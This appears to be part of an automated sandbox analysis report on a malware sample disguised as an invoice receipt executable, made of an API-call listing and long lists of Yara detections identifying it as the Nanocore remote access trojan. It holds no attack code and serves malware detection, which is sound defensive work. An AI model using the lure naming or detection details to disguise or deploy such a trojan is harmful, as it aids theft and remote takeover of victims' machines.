Code function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404F61

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 14.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.38e3258.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.4830000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37b0e54.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.658288.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.24b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.50a9b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.658288.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3011458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3000000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2540000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2551458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37ac01e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3011458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37b547d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.3960e54.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.3733258.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3000000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.50a9b8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.3960e54.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.2260000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.2260000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.24b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2551458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.395c01e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37b0e54.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.3733258.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.396547d.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.38e3258.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2540000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359622615.000000000391A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.341299575.000000000376A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 6964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 7092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6820, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 16.2.chmac.exe.2906888.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.chmac.exe.38e3258.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.38e3258.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.4830000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.4830000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.37b0e54.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.658288.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.658288.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.chmac.exe.24b0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.24b0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.50a9b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.50a9b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.chmac.exe.658288.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.658288.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.chmac.exe.3011458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.chmac.exe.3011458.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.2756888.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.chmac.exe.3000000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.chmac.exe.3000000.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.chmac.exe.2540000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.chmac.exe.2540000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.chmac.exe.2551458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.chmac.exe.2551458.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.37ac01e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.37ac01e.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.chmac.exe.3011458.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.chmac.exe.3011458.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.37b547d.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.3960e54.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.3733258.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.3733258.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.chmac.exe.3000000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.chmac.exe.3000000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.50a9b8.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.50a9b8.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.chmac.exe.3960e54.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.2260000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.2260000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.2260000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.2260000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.chmac.exe.2500000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.2500000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.chmac.exe.24b0000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.24b0000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
